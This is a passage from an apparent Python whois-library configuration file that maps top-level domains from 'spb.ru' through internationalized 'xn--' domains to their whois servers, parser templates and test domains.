\"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"spb.ru\"] = {\"extend\": \"com.ru\", \"_test\": \"iac.spb.ru\"}\nZZ[\"sport\"] = {\"_server\": \"whois.nic.sport\", \"extend\": \"com\", \"_test\": \"nic.sport\"}\nZZ[\"spot\"] = {\"_server\": \"whois.nic.spot\", \"extend\": \"com\", \"_test\": \"nic.spot\"}\nZZ[\"sr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"srl\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"ss\"] = {\"_server\": \"whois.nic.ss\", \"extend\": \"com\", \"_test\": \"nic.ss\"}\nZZ[\"stada\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"star\"] = {\"_server\": \"whois.nic.star\", \"extend\": \"com\", \"_test\": \"nic.star\"}\nZZ[\"statebank\"] = {\"_server\": \"whois.nic.statebank\", \"extend\": \"com\", \"_test\": \"nic.statebank\"}\nZZ[\"stcgroup\"] = {\"_server\": \"whois.nic.stcgroup\", \"extend\": \"com\", \"_test\": \"nic.stcgroup\"}\nZZ[\"stc\"] = {\"_server\": \"whois.nic.stc\", \"extend\": \"com\", \"_test\": \"nic.stc\"}\nZZ[\"stockholm\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"storage\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"store\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"stream\"] = {\"_server\": \"whois.nic.stream\", \"extend\": \"com\", \"_test\": \"nic.stream\"}\nZZ[\"studio\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"study\"] = {\"extend\": \"com\"}\nZZ[\"style\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"sucks\"] = {\"_server\": \"whois.nic.sucks\", \"extend\": \"com\", \"_test\": \"nic.sucks\"}\nZZ[\"su\"] = {\"extend\": \"ru\"}\nZZ[\"supplies\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"supply\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"support\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"surf\"] = {\"_server\": \"whois.nic.surf\", \"extend\": \"com\", \"_test\": \"nic.surf\"}\nZZ[\"surgery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"suzuki\"] = {\"_server\": \"whois.nic.suzuki\", \"extend\": \"com\", \"_test\": \"nic.suzuki\"}\nZZ[\"sv\"] = {\"_privateRegistry\": True}\nZZ[\"swatch\"] = {\"_server\": \"whois.nic.swatch\", \"extend\": \"com\", \"_test\": \"nic.swatch\"}\nZZ[\"swiss\"] = {\"_server\": \"whois.nic.swiss\", \"extend\": \"com\", \"_test\": \"nic.swiss\"}\nZZ[\"sx\"] = {\"extend\": \"com\", \"_server\": \"whois.sx\"}\nZZ[\"sydney\"] = {\"_server\": \"whois.nic.sydney\", \"extend\": \"com\", \"_test\": \"nic.sydney\"}\nZZ[\"sy\"] = {\"extend\": \"com\", \"_server\": \"whois.tld.sy\", \"_test\": \"tld.sy\"}\nZZ[\"systems\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tab\"] = {\"_server\": \"whois.nic.tab\", \"extend\": \"com\", \"_test\": \"nic.tab\"}\nZZ[\"taipei\"] = {\"_server\": \"whois.nic.taipei\", \"extend\": \"com\", \"_test\": \"nic.taipei\"}\nZZ[\"talk\"] = {\"_server\": \"whois.nic.talk\", \"extend\": \"com\", \"_test\": \"nic.talk\"}\nZZ[\"taobao\"] = {\"_server\": \"whois.nic.taobao\", \"extend\": \"com\", \"_test\": \"nic.taobao\"}\nZZ[\"tatamotors\"] = {\"_server\": \"whois.nic.tatamotors\", \"extend\": \"com\", \"_test\": \"nic.tatamotors\"}\nZZ[\"tatar\"] = {\"_server\": \"whois.nic.tatar\", \"extend\": \"com\", \"_test\": \"nic.tatar\"}\nZZ[\"tattoo\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"tax\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"taxi\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tci\"] = {\"_server\": \"whois.nic.tci\", \"extend\": \"com\", \"_test\": \"nic.tci\"}\nZZ[\"tdk\"] = {\"_server\": \"whois.nic.tdk\", \"extend\": \"com\", \"_test\": \"nic.tdk\"}\nZZ[\"td\"] = {\"_server\": \"whois.nic.td\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\"), \"_test\": \"nic.td\"}\nZZ[\"team\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tech\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"technology\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"temasek\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"tennis\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"teva\"] = {\"_server\": \"whois.nic.teva\", \"extend\": \"com\", \"_test\": \"nic.teva\"}\nZZ[\"tf\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.tf\", \"_test\": \"nic.tf\"}\nZZ[\"thd\"] = {\"_server\": \"whois.nic.thd\", \"extend\": \"com\", \"_test\": \"nic.thd\"}\nZZ[\"theater\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"theatre\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"th\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\", \"_test\": \"thnic.co.th\"}\nZZ[\"tiaa\"] = {\"_server\": \"whois.nic.tiaa\", \"extend\": \"com\", \"_test\": \"nic.tiaa\"}\nZZ[\"tickets\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"tienda\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tips\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tires\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tirol\"] = {\"_server\": \"whois.nic.tirol\", \"extend\": \"com\", \"_test\": \"nic.tirol\"}\nZZ[\"tk\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tl\"] = {\"extend\": \"com\"}\nZZ[\"tmall\"] = {\"_server\": \"whois.nic.tmall\", \"extend\": \"com\", \"_test\": \"nic.tmall\"}\nZZ[\"today\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"to\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tokyo\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.tokyo\", \"_test\": \"nic.tokyo\"}\nZZ[\"tools\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"top\"] = {\"extend\": \"com\"}\nZZ[\"toray\"] = {\"_server\": \"whois.nic.toray\", \"extend\": \"com\", \"_test\": \"nic.toray\"}\nZZ[\"toshiba\"] = {\"_server\": \"whois.nic.toshiba\", \"extend\": \"com\", \"_test\": \"nic.toshiba\"}\nZZ[\"total\"] = {\"_server\": \"whois.nic.total\", \"extend\": \"com\", \"_test\": \"nic.total\"}\nZZ[\"tours\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"town\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"toyota\"] = {\"_server\": \"whois.nic.toyota\", \"extend\": \"com\", \"_test\": \"nic.toyota\"}\nZZ[\"toys\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"trade\"] = {\"extend\": \"amsterdam\"}\nZZ[\"trading\"] = {\"_server\": \"whois.nic.trading\", \"extend\": \"com\", \"_test\": \"nic.trading\"}\nZZ[\"training\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"travelersinsurance\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"travelers\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"travel\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"tr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"trust\"] = {\"_server\": \"whois.nic.trust\", \"extend\": \"com\", \"_test\": \"nic.trust\"}\nZZ[\"trv\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"tt\"] = {\"extend\": \"_privateReg\"}\nZZ[\"tube\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.tube\", \"_test\": \"nic.tube\"}\nZZ[\"tui\"] = {\"_server\": \"whois.nic.tui\", \"extend\": \"com\", \"_test\": \"nic.tui\"}\nZZ[\"tunes\"] = {\"_server\": \"whois.nic.tunes\", \"extend\": \"com\", \"_test\": \"nic.tunes\"}\nZZ[\"tushu\"] = {\"_server\": \"whois.nic.tushu\", \"extend\": \"com\", \"_test\": \"nic.tushu\"}\nZZ[\"tvs\"] = {\"_server\": \"whois.nic.tvs\", \"extend\": \"com\", \"_test\": \"nic.tvs\"}\nZZ[\"ubank\"] = {\"_server\": \"whois.nic.ubank\", \"extend\": \"com\", \"_test\": \"nic.ubank\"}\nZZ[\"ubs\"] = {\"_server\": \"whois.nic.ubs\", \"extend\": \"com\", \"_test\": \"nic.ubs\"}\nZZ[\"unicom\"] = {\"_server\": \"whois.nic.unicom\", \"extend\": \"com\", \"_test\": \"nic.unicom\"}\nZZ[\"university\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"uno\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"uol\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"ups\"] = {\"_server\": \"whois.nic.ups\", \"extend\": \"com\", \"_test\": \"nic.ups\"}\nZZ[\"us\"] = {\"extend\": \"name\"}\nZZ[\"uy\"] = {\"extend\": \"_privateReg\"} # Uruguay\nZZ[\"vacations\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"va\"] = {\"extend\": \"_privateReg\"} # This TLD has no whois server.\nZZ[\"vana\"] = {\"_server\": \"whois.nic.vana\", \"extend\": \"com\", \"_test\": \"nic.vana\"}\nZZ[\"vanguard\"] = {\"_server\": \"whois.nic.vanguard\", \"extend\": \"com\", \"_test\": \"nic.vanguard\"}\nZZ[\"vc\"] = {\"extend\": \"com\"}\nZZ[\"vegas\"] = {\"_server\": \"whois.nic.vegas\", \"extend\": \"com\", \"_test\": \"nic.vegas\"}\nZZ[\"ventures\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"verisign\"] = {\"_server\": \"whois.nic.verisign\", \"extend\": \"com\", \"_test\": \"nic.verisign\"}\nZZ[\"vermögensberater\"] = {\"_server\": \"whois.nic.xn--vermgensberater-ctb\", \"extend\": \"xn--vermgensberater-ctb\"}\nZZ[\"vermögensberatung\"] = {\"_server\": \"whois.nic.xn--vermgensberatung-pwb\", \"extend\": \"xn--vermgensberatung-pwb\"}\nZZ[\"versicherung\"] = {\"_server\": \"whois.nic.versicherung\", \"extend\": \"com\", \"_test\": \"nic.versicherung\"}\nZZ[\"vet\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vg\"] = {\"_server\": \"whois.nic.vg\", \"extend\": \"com\", \"_test\": \"nic.vg\"}\nZZ[\"viajes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"video\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vig\"] = {\"extend\": \"com\", \"_server\": \"whois.afilias-srs.net\"}\nZZ[\"vig\"] = {\"_server\": \"whois.nic.vig\", \"extend\": \"com\", \"_test\": \"nic.vig\"}\nZZ[\"viking\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"villas\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vin\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vip\"] = {\"_server\": \"whois.nic.vip\", \"extend\": \"com\", \"updated_date\": None, \"_test\": \"nic.vip\"}\nZZ[\"virgin\"] = {\"_server\": \"whois.nic.virgin\", \"extend\": \"com\", \"_test\": \"nic.virgin\"}\nZZ[\"visa\"] = {\"_server\": \"whois.nic.visa\", \"extend\": \"com\", \"_test\": \"nic.visa\"}\nZZ[\"vision\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"viva\"] = {\"_server\": \"whois.nic.viva\", \"extend\": \"com\", \"_test\": \"nic.viva\"}\nZZ[\"vlaanderen\"] = {\"_server\": \"whois.nic.vlaanderen\", \"extend\": \"com\", \"_test\": \"nic.vlaanderen\"}\nZZ[\"vn\"] = {\"extend\": \"_privateReg\"}\nZZ[\"vodka\"] = {\"_server\": \"whois.nic.vodka\", \"extend\": \"com\", \"_test\": \"nic.vodka\"}\nZZ[\"volkswagen\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"volvo\"] = {\"_server\": \"whois.nic.volvo\", \"extend\": \"com\", \"_test\": \"nic.volvo\"}\nZZ[\"vote\"] = {\"_server\": \"whois.nic.vote\", \"extend\": \"com\", \"_test\": \"nic.vote\"}\nZZ[\"voting\"] = {\"_server\": \"whois.nic.voting\", \"extend\": \"com\", \"_test\": \"nic.voting\"}\nZZ[\"voto\"] = {\"_server\": \"whois.nic.voto\", \"extend\": \"com\", \"_test\": \"nic.voto\"}\nZZ[\"voyage\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"vu\"] = {\"extend\": \"_privateReg\"} # all dates 1970 , no furter relevant info\nZZ[\"wales\"] = {\"_server\": \"whois.nic.wales\", \"extend\": \"com\", \"_test\": \"nic.wales\"}\nZZ[\"walmart\"] = {\"_server\": \"whois.nic.walmart\", \"extend\": \"com\", \"_test\": \"nic.walmart\"}\nZZ[\"walter\"] = {\"_server\": \"whois.nic.walter\", \"extend\": \"com\", \"_test\": \"nic.walter\"}\nZZ[\"wang\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": \"nic.wang\"}\nZZ[\"wanggou\"] = {\"_server\": \"whois.nic.wanggou\", \"extend\": \"com\", \"_test\": \"nic.wanggou\"}\nZZ[\"watches\"] = {\"_server\": \"whois.nic.watches\", \"extend\": \"com\", \"_test\": \"nic.watches\"}\nZZ[\"watch\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"webcam\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.webcam\", \"_test\": \"nic.webcam\"}\nZZ[\"weber\"] = {\"_server\": \"whois.nic.weber\", \"extend\": \"com\", \"_test\": \"nic.weber\"}\nZZ[\"website\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"web.ve\"] = {\"extend\": \"ve\"}\nZZ[\"web.za\"] = {\"extend\": \"za\", \"_server\": \"web-whois.registry.net.za\"}\nZZ[\"wedding\"] = {\"_server\": \"whois.nic.wedding\", \"extend\": \"com\", \"_test\": \"nic.wedding\"}\nZZ[\"wed\"] = {\"_server\": \"whois.nic.wed\", \"extend\": \"com\", \"_test\": \"nic.wed\"}\nZZ[\"weibo\"] = {\"_server\": \"whois.nic.weibo\", \"extend\": \"com\", \"_test\": \"nic.weibo\"}\nZZ[\"whoswho\"] = {\"_server\": \"whois.nic.whoswho\", \"extend\": \"com\", \"_test\": \"nic.whoswho\"}\nZZ[\"wien\"] = {\"_server\": \"whois.nic.wien\", \"extend\": \"com\", \"_test\": \"nic.wien\"}\nZZ[\"wine\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"win\"] = {\"extend\": \"com\"}\nZZ[\"wme\"] = {\"_server\": \"whois.nic.wme\", \"extend\": \"com\", \"_test\": \"nic.wme\"}\nZZ[\"wolterskluwer\"] = {\"_server\": \"whois.nic.wolterskluwer\", \"extend\": \"com\", \"_test\": \"nic.wolterskluwer\"}\nZZ[\"woodside\"] = {\"_server\": \"whois.nic.woodside\", \"extend\": \"com\", \"_test\": \"nic.woodside\"}\nZZ[\"works\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"world\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"wow\"] = {\"_server\": \"whois.nic.wow\", \"extend\": \"com\", \"_test\": \"nic.wow\"}\nZZ[\"wtc\"] = {\"_server\": \"whois.nic.wtc\", \"extend\": \"com\", \"_test\": \"nic.wtc\"}\nZZ[\"wtf\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"xerox\"] = {\"_server\": \"whois.nic.xerox\", \"extend\": \"com\", \"_test\": \"nic.xerox\"}\nZZ[\"xfinity\"] = {\"_server\": \"whois.nic.xfinity\", \"extend\": \"com\", \"_test\": \"nic.xfinity\"}\nZZ[\"xihuan\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xin\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.xin\", \"_test\": \"nic.xin\"}\nZZ[\"xn--11b4c3d\"] = {\"_server\": \"whois.nic.xn--11b4c3d\", \"extend\": \"com\", \"_test\": \"nic.xn--11b4c3d\"}\nZZ[\"xn--1qqw23a\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--2scrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--30rr7y\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--3bst00m\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--3ds443g\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--3e0b707e\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"xn--3hcrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--3pxu8k\"] = {\"_server\": \"whois.nic.xn--3pxu8k\", \"extend\": \"com\", \"_test\": \"nic.xn--3pxu8k\"}\nZZ[\"xn--42c2d9a\"] = {\"_server\": \"whois.nic.xn--42c2d9a\", \"extend\": \"com\", \"_test\": \"nic.xn--42c2d9a\"}\nZZ[\"xn--45br5cyl\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--45brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--45q11c\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--4gbrim\"] = {\"_server\": \"whois.nic.xn--4gbrim\", \"extend\": \"com\", \"_test\": \"nic.xn--4gbrim\"}\nZZ[\"xn--55qx5d\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--5su34j936bgsg\"] = {\"_server\": \"whois.nic.xn--5su34j936bgsg\", \"extend\": \"com\", \"_test\": \"nic.xn--5su34j936bgsg\"}\nZZ[\"xn--5tzm5g\"] = {\"_server\": \"whois.nic.xn--5tzm5g\", \"extend\": \"com\", \"_test\": \"nic.xn--5tzm5g\"}\nZZ[\"xn--6frz82g\"] = {\"_server\": \"whois.nic.xn--6frz82g\", \"extend\": \"com\", \"_test\": \"nic.xn--6frz82g\"}\nZZ[\"xn--6qq986b3xl\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--80adxhks\"] = {\"_server\": \"whois.nic.xn--80adxhks\", \"extend\": \"com\", \"_test\": \"nic.xn--80adxhks\"}\nZZ[\"xn--80aqecdr1a\"] = {\"_server\": \"whois.nic.xn--80aqecdr1a\", \"extend\": \"com\", \"_test\": \"nic.xn--80aqecdr1a\"}\nZZ[\"xn--80asehdb\"] = {\"extend\": \"com\"}\nZZ[\"xn--80asehdb\"] = {\"_server\": \"whois.nic.xn--80asehdb\", \"extend\": \"com\", \"_test\": \"nic.xn--80asehdb\"}\nZZ[\"xn--80aswg\"] = {\"_server\": \"whois.nic.xn--80aswg\", \"extend\": \"com\", \"_test\": \"nic.xn--80aswg\"}\nZZ[\"xn--8y0a063a\"] = {\"_server\": \"whois.nic.xn--8y0a063a\", \"extend\": \"com\", \"_test\": \"nic.xn--8y0a063a\"}\nZZ[\"xn--9dbq2a\"] = {\"_server\": \"whois.nic.xn--9dbq2a\", \"extend\": \"com\", \"_test\": \"nic.xn--9dbq2a\"}\nZZ[\"xn--9et52u\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--9krt00a\"] = {\"_server\": \"whois.nic.xn--9krt00a\", \"extend\": \"com\", \"_test\": \"nic.xn--9krt00a\"}\nZZ[\"xn--b4w605ferd\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"xn--c1avg\"] = {\"_server\": \"whois.nic.xn--c1avg\", \"extend\": \"com\", \"_test\": \"nic.xn--c1avg\"}\nZZ[\"xn--c2br7g\"] = {\"_server\": \"whois.nic.xn--c2br7g\", \"extend\": \"com\", \"_test\": \"nic.xn--c2br7g\"}\nZZ[\"xn--cckwcxetd\"] = {\"_server\": \"whois.nic.xn--cckwcxetd\", \"extend\": \"com\", \"_test\": \"nic.xn--cckwcxetd\"}\nZZ[\"xn--cg4bki\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"xn--clchc0ea0b2g2a9gcd\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"xn--czrs0t\"] = {\"_server\": \"whois.nic.xn--czrs0t\", \"extend\": \"com\", \"_test\": \"nic.xn--czrs0t\"}\nZZ[\"xn--czru2d\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--d1alf\"] = {\"_server\": \"whois.marnet.mk\", \"extend\": \"mk\"}\nZZ[\"xn--e1a4c\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"xn--efvy88h\"] = {\"_server\": \"whois.nic.xn--efvy88h\", \"extend\": \"com\", \"_test\": \"nic.xn--efvy88h\"}\nZZ[\"xn--fhbei\"] = {\"_server\": \"whois.nic.xn--fhbei\", \"extend\": \"com\", \"_test\": \"nic.xn--fhbei\"}\nZZ[\"xn--fiq228c5hs\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--fiq64b\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--fiqs8s\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"com\"}\nZZ[\"xn--fiqz9s\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"com\"}\nZZ[\"xn--fjq720a\"] = {\"_server\": \"whois.nic.xn--fjq720a\", \"extend\": \"com\", \"_test\": \"nic.xn--fjq720a\"}\nZZ[\"xn--flw351e\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--fpcrj9c3d\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--fzys8d69uvgm\"] = {\"_server\": \"whois.nic.xn--fzys8d69uvgm\", \"extend\": \"com\", \"_test\": \"nic.xn--fzys8d69uvgm\"}\nZZ[\"xn--gecrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2breg3eve\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2brj9c8c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--hxt814e\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--i1b6b1a6a2e\"] = {\"_server\": \"whois.nic.xn--i1b6b1a6a2e\", \"extend\": \"com\", \"_test\": \"nic.xn--i1b6b1a6a2e\"}\nZZ[\"xn--io0a7i\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--j1aef\"] = {\"_server\": \"whois.nic.xn--j1aef\", \"extend\": \"com\", \"_test\": \"nic.xn--j1aef\"}\nZZ[\"xn--j6w193g\"] = {\"_server\": \"whois.hkirc.hk\", \"extend\": \"hk\", \"_test\": \"hkirc.hk\"}\nZZ[\"xn--jlq480n2rg\"] = {\"_server\": \"whois.nic.xn--jlq480n2rg\", \"extend\": \"com\", \"_test\": \"nic.xn--jlq480n2rg\"}\nZZ[\"xn--kcrx77d1x4a\"] = {\"_server\": \"whois.nic.xn--kcrx77d1x4a\", \"extend\": \"com\", \"_test\": \"nic.xn--kcrx77d1x4a\"}\nZZ[\"xn--kprw13d\"] = {\"extend\": \"tw\", \"_test\": \"google.xn--kprw13d\"}\nZZ[\"xn--kpry57d\"] = {\"extend\": \"tw\", \"_test\": \"google.xn--kpry57d\"}\nZZ[\"xn--kput3i\"] = {\"_server\": \"whois.nic.xn--kput3i\", \"extend\": \"com\", \"_test\": \"nic.xn--kput3i\"}\nZZ[\"xn--mgb9awbf\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"om\"}\nZZ[\"xn--mgba7c0bbn0a\"] = {\"_server\": \"whois.nic.xn--mgba7c0bbn0a\", \"extend\": \"com\", \"_test\": \"nic.xn--mgba7c0bbn0a\"}\nZZ[\"xn--mgbaakc7dvf\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"xn--mgbab2bd\"] = {\"_server\": \"whois.nic.xn--mgbab2bd\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbab2bd\"}\nZZ[\"xn--mgbah1a3hjkrd\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"mr\"}\nZZ[\"xn--mgbbh1a71e\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbbh1a\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbca7dzdo\"] = {\"_server\": \"whois.nic.xn--mgbca7dzdo\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbca7dzdo\"}\nZZ[\"xn--mgbgu82a\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbi4ecexp\"] = {\"_server\": \"whois.nic.xn--mgbi4ecexp\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbi4ecexp\"}\nZZ[\"xn--mgbt3dhd\"] = {\"_server\": \"whois.nic.xn--mgbt3dhd\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbt3dhd\"}\nZZ[\"xn--mix891f\"] = {\"_server\": \"whois.monic.mo\", \"extend\": \"mo\"}\nZZ[\"xn--mk1bu44c\"] = {\"_server\": \"whois.nic.xn--mk1bu44c\", \"extend\": \"com\", \"_test\": \"nic.xn--mk1bu44c\"}\nZZ[\"xn--mxtq1m\"] = {\"_server\": \"whois.nic.xn--mxtq1m\", \"extend\": \"com\", \"_test\": \"nic.xn--mxtq1m\"}\nZZ[\"xn--ngbc5azd\"] = {\"_server\": \"whois.nic.xn--ngbc5azd\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbc5azd\"}\nZZ[\"xn--ngbe9e0a\"] = {\"_server\": \"whois.nic.xn--ngbe9e0a\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbe9e0a\"}\nZZ[\"xn--ngbrx\"] = {\"_server\": \"whois.nic.xn--ngbrx\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbrx\"}\nZZ[\"xn--nqv7fs00ema\"] = {\"_server\": \"whois.nic.xn--nqv7fs00ema\", \"extend\": \"com\", \"_test\": \"nic.xn--nqv7fs00ema\"}\nZZ[\"xn--nqv7f\"] = {\"_server\": \"whois.nic.xn--nqv7f\", \"extend\": \"com\", \"_test\": \"nic.xn--nqv7f\"}\nZZ[\"xn--o3cw4h\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\"}\nZZ[\"xn--ogbpf8fl\"] = {\"_server\": \"whois.tld.sy\", \"extend\": \"sy\", \"_test\": \"tld.sy\"}\nZZ[\"xn--p1acf\"] = {\"extend\": \"com\"}\nZZ[\"xn--p1ai\"] = {\"extend\": \"ru\"}\nZZ[\"xn--pssy2u\"] = {\"_server\": \"whois.nic.xn--pssy2u\", \"extend\": \"com\", \"_test\": \"nic.xn--pssy2u\"}\nZZ[\"xn--q9jyb4c\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--qcka1pmc\"] = {\"_server\": 